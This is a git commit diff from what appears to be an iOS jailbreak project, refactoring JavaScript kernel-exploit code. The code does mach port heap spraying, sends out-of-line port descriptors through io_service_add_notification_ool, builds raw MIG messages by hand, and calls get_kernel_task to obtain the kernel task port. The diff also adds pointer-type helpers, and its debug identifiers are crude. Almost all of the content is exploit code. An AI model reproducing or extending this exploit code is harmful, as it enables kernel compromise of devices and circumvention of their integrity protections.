push for later

author: spv420 <spv@spv.sh> 2022-08-01 03:57:04 -0400
committer: spv420 <spv@spv.sh> 2022-08-01 03:57:04 -0400
commit: 5ed6a7bb64ecf24c6dd12506688b43d9f33b65d2 (patch)
tree: 5ccf8eb5c4897b2fbe79c68d9c9b67a761b662dc /src
parent: 54b6c9d393e2384f7833155509f2e09677360390 (diff)
3 files changed, 114 insertions, 92 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index c72963c..8103639 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -112,17 +112,17 @@ function copyinPort(kport, cnt) {
 	var it = shit_heap(4);
 	var o = MACH_PORT_NULL;
 	var data = shit_heap(4);
-	var master = shit_heap(4);
+	var master = new io_master_t();
 	fakeportData = shit_heap(4);
 	var host_self = mach_host_self();
-	host_get_io_master(mach_host_self(), master);
+	host_get_io_master(mach_host_self(), master.addy);
 	ret = spray_data(NULL, 0, 5, data);
 	p0laris_log("sprayed, still here\n");
 	p0laris_log("spray_data=%d (%s)\n", ret, mach_error_string(ret));
 	p0laris_log("sprayed, still here\n");
 
 //	p0laris_log("%x %x\n", master, read_u32(master));
-	service = IOServiceGetMatchingService(read_u32(master), IOServiceMatching("AppleMobileFileIntegrity"));
+	service = IOServiceGetMatchingService(master.deref(), IOServiceMatching("AppleMobileFileIntegrity"));
 	p0laris_log("service=%x\n", service);
 
 	var tst = sptr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
@@ -181,22 +181,17 @@ function prepare_ptr(dict, size, ptr, num) {
 }
 
 function spray(dict, size, port) {
-	var err = shit_heap(4);
+	var master = new io_master_t();
+	var err = new uint32_t();
 	var ret = 0;
-	var master = shit_heap(4);
 
-	ret = host_get_io_master(mach_host_self(), master);
-//	p0laris_log("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
-//	p0laris_log("0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
-	ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
-//	p0laris_log("yahtzee %d (%s)\n", ret, mach_error_string(ret));
+	ret = host_get_io_master(mach_host_self(), master.addy);
+	ret = io_service_add_notification_ool(master.deref(), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err.addy, port);
 
 	if (ret == KERN_SUCCESS) {
-		ret = read_u32(err);
+		ret = err.deref();
 	}
 
-//	p0laris_log("yahtzee2 %d (%s)\n", ret, mach_error_string(ret));
-
 	return ret;
 }
 
@@ -245,40 +240,6 @@ function fast_array_mul(arr, n) {
 }
 
 function send_ports(target, payload, num, number_port_descs) {
-	if (0) {
-	var init_port_set = shit_heap(num * 4);
-
-	for (var i = 0; i < num; i++) {
-		write_u32(init_port_set + (i << 2), payload);
-	}
-
-	//	var buf = shit_heap(0x1c + (number_port_descs * 0xc * 8));
-
-//	write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
-
-//	var buf = new Uint32Array((0x1c + (3 * number_port_descs);
-
-//	write_u32(number_port_descs);
-
-	large_buf[req_msgh_body_msgh_descriptor_count >> 2] = number_port_descs;
-
-	var tmp = ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24));
-
-	for (var i = 0; i < number_port_descs; i++) {
-		var tmp2 = (i * 3) + (req_init_port_set >>> 2);
-		large_buf[tmp2 + 0] = (init_port_set);
-		large_buf[tmp2 + 1] = (num);
-		large_buf[tmp2 + 2] = tmp;
-	}
-
-	large_buf[req_head_msgh_bits >>> 2] = 0x80001513; // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
-	large_buf[req_head_msgh_request_port >>> 2] = target;
-	large_buf[req_head_msgh_reply_port >>> 2] = 0; 
-	large_buf[req_head_msgh_id >>> 2] = 1337;
-
-//	p0laris_log("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
-}
-
 	var init_port_set = new mach_port_t(num);
 
 	var InP = new Request_sp(number_port_descs);
@@ -306,57 +267,21 @@ function send_ports(target, payload, num, number_port_descs) {
 }
 
 function release_port_ptrs(port) {
-//	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-//	p0laris_log("fuck");
-	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-//	p0laris_log("fuck");
-	//	p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
-	var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
-//	p0laris_log("fuck");
+	var req = new uint8_t(0x1c + (5 * 0xc) + 0x8);
+	var ret = mach_msg(req.addy, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+
 	if (ret != KERN_SUCCESS) {
 		p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
-//		p0laris_log("fuck2");
 	}
-//	p0laris_log("fuck");
-	shit_heap_free(req);
-//	p0laris_log("fuck");
 }
 
 function r3gister(task, init_port_set, real_count, fake_count) {
 	var mess = shit_heap(0x1000);
-	var InP = mess;
-	var OutP = mess;
+//	var InP = mess;
+//	var OutP = mess;
 
-	/*
-	    InP->msgh_body.msgh_descriptor_count = 1;
-    InP->init_port_set.address = (void*)(init_port_set);
-    InP->init_port_set.count = real_count;
-    InP->init_port_set.disposition = 19;
-    InP->init_port_set.deallocate =  FALSE;
-    InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
-    InP->NDR = NDR_record;
-    InP->init_port_setCnt = fake_count; // was real_count
-    InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
-    InP->Head.msgh_remote_port = task;
-    InP->Head.msgh_local_port = mig_get_local_port();
-    InP->Head.msgh_id = 3403;
-	    InP->msgh_body.msgh_descriptor_count  0x18 0x4
-    InP->init_port_set.address  0x1c 0x4
-    InP->init_port_set.count  0x20 0x4
-    InP->init_port_set  0x1c
-    InP->NDR  0x28 0x8
-    InP->init_port_setCnt  0x30 0x4
-    InP->Head.msgh_bits  0x0 0x4
-    InP->Head.msgh_remote_port  0x8 0x4
-    InP->Head.msgh_local_port  0xc 0x4
-    InP->Head.msgh_id  0x14 0x4
-0x00000003
-0x00000034 0x0000002c
-0x00000024
-50
-78
-0x0 0x1057ec
-	 */
+	var InP = new Request(1, mess);
+	var OutP = new Reply(1, mess);
 
 	write_u32(InP + 0x18, 1);
 	write_u32(InP + 0x1c, init_port_set);
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 3741e80..81ac562 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -255,6 +255,58 @@ function Request_sp_obj_to_buf(obj) {
 	return ret;
 }
 
+function Request_r3_buf_to_obj(buf) {
+	var ret = {};
+	var Head_buf = buf.subarray(0, 24);
+	var msgh_body_buf = buf.subarray(24, 28);
+	var init_port_set_buf = buf.subarray(28, 40);
+	var NDR_buf = buf.subarray(40, 48);
+	var init_port_setCnt_buf = buf.subarray(48, 52);
+	ret.Head = mach_msg_header_t_buf_to_obj(Head_buf);
+	ret.msgh_body = mach_msg_body_t_buf_to_obj(msgh_body_buf);
+	ret.init_port_set = mach_msg_ool_ports_descriptor_t_buf_to_obj(init_port_set_buf);
+	ret.NDR = buf_ret(NDR_buf);
+	ret.init_port_setCnt = u8x4_to_u32(init_port_setCnt_buf);
+
+	return ret;
+}
+
+/*
+function Request_r3_buf_to_obj(buf) {
+	var ret = new Uint8Array(this.size);
+	var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
+	var begin = 0;
+	var i = 0;
+
+	begin = i;
+
+	for (; i < 24; i++) {
+		ret[i] = tmp[i - begin];
+	}
+
+	begin = i;
+
+	var tmp = mach_msg_body_t_obj_to_buf(obj.msgh_body);
+
+	for (; i < 28; i++) {
+		ret[i] = tmp[i - begin];
+	}
+
+	var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set[i]);
+
+	begin = i;
+
+	for (; i < 36; i++) {
+		ret[i] = tmp[i - begin];
+	}
+
+
+}*/
+
+function buf_ret(buf) {
+	return buf;
+}
+
 var mach_msg_header_t = native_ptr_type(24,
 	mach_msg_header_t_buf_to_obj,
 	mach_msg_header_t_obj_to_buf);
@@ -269,4 +321,19 @@ var Request_sp = native_ptr_type(24 + 4 + 12,
 	Request_sp_obj_to_buf);
 Request_sp.prototype.deref_all = true;
 
-var mach_port_t = native_ptr_type(4);
-\ No newline at end of file
+var uint32_t = native_ptr_type(4);
+var mach_port_t = uint32_t;
+var io_master_t = mach_port_t;
+
+var uint8_t = native_ptr_type(1);
+
+var NDR_record_t = native_ptr_type(8, buf_ret, buf_ret);
+var kern_return_t = uint32_t;
+var mach_msg_type_number_t = uint32_t;
+
+var Request_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4,
+	Request_r3_buf_to_obj,
+	buf_ret);
+
+var mach_msg_trailer_type_t = uint32_t;
+var mach_msg_trailer_size_t = uint32_t;
+\ No newline at end of file
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 6d14de1..7baffe2 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -122,7 +122,37 @@ function main() {
 			return value;
 		}, "\t"));
 		p0laris_log("here");
-	}
+	
+	var mess = shit_heap(0x1000);
+	var InP = mess;
+	var OutP = mess;
+
+	write_u32(InP + 0x18, 1);
+	write_u32(InP + 0x1c, 0x69);
+	write_u32(InP + 0x20, 0x420);
+	write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+	write_u32(InP + 0x28, 0x1234);
+	write_u32(InP + 0x2c, 0x5678);
+	write_u32(InP + 0x30, 0x9999);
+	write_u32(InP + 0x0, 0x80001513);
+	write_u32(InP + 0x8, 0x4141);
+	write_u32(InP + 0xc, mig_get_reply_port());
+	write_u32(InP + 0x14, 3403);
+
+		p0laris_log("here");
+		var InP_ptr = new Request_r3(1, InP);
+		p0laris_log("here");
+
+	p0laris_log("%s", JSON.stringify(InP_ptr.deref(), function (key, value) {
+		if (typeof value === 'number') {
+			return "0x" + value.toString(16);
+		}
+
+		return value;
+	}, "\t"));
+}
+
+//	return;
 
 	var tfp0 = get_kernel_task();
author	spv420 <spv@spv.sh>	2022-08-01 03:57:04 -0400
committer	spv420 <spv@spv.sh>	2022-08-01 03:57:04 -0400
commit	5ed6a7bb64ecf24c6dd12506688b43d9f33b65d2 (patch)
tree	5ccf8eb5c4897b2fbe79c68d9c9b67a761b662dc /src
parent	54b6c9d393e2384f7833155509f2e09677360390 (diff)